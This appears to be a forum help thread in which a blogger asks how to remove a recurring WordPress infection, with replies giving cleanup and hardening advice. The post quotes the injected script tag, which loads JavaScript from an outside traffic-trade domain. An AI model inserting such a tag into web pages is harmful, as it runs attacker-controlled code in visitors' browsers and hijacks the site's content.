: How to fix Malware in WordPress? From past few days, I am facing malware issue on my 3 blogs. This is happening because of this script: <script src='https://blue.traffictrade.life/main.js' type='text/javascript'></scrip
From past few days, I am facing malware issue on my 3 blogs. This is happening because of this script:
<script src='https://blue.traffictrade.life/main.js' type='text/javascript'></script>
I found this in the header at the place of Google ads unit. This script replaces header ad unit with the mentioned script and removes all ad units from the domain.
When I remove this script, the blog works normally but only for 24-48 hours. After 48 hours, the same script comes back at the same place. Can anybody help me to get rid of this script?
More posts by @Pierce454
2 Comments
Sorted by latest first Latest Oldest Best
I echo Henry's answer. You need to run some sort of scanner over your site. Your host may have something like clam anti virus. It may identify infected files, but just cleaning them up manually - a long and tedious process prone to causing errors - may not be enough.
Once you have found each and every infected file, plus the file that is writing the infections, it is important to find where the hackers are gaining entry. It is likely through a vulnerable plugin.
Ah, WordPress malware. This can take many forms. Here are some things you can do:
Research the script. Chances are, others have encountered it, and have posted to message boards looking for solutions. You might be able to glimpse info like where this script lives and how to deal with it.
Contact your web hosting provider. A reputable host will be able to send you the file names where the script has been injected. You will then have to go through your files manually and remove the malicious script. (The sooner you do this, the better - web hosts can pull infected sites to avoid the virus propagating though the network.) You do remove the script, you mentioned, but if you don't remove all instances of it, it'll just come back.
Your malware is likely embedded in your various PHP files. In some instances, it's also in the body of the pages. You may have to go through PHP as well as HTML to ensure all is copacetic. (Outdated JavaScript has also been known to get hacked.)
If this is an ad plugin issue, perhaps the plugin is not secure. You may have to delete and reinstall the plugin. It may have been infected, or it may have a security flaw.
After you've taken the time to clean up the site, change your password. And make sure you install a security plugin, like WordFence.
If all of that fails, you may need to hire a security specialist by the hour to fix your sites. Also, consider switching your hosting to WPEngine or a similar (pricey but effective) solution. Either way, prepare to spend many hours or even days on this...
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.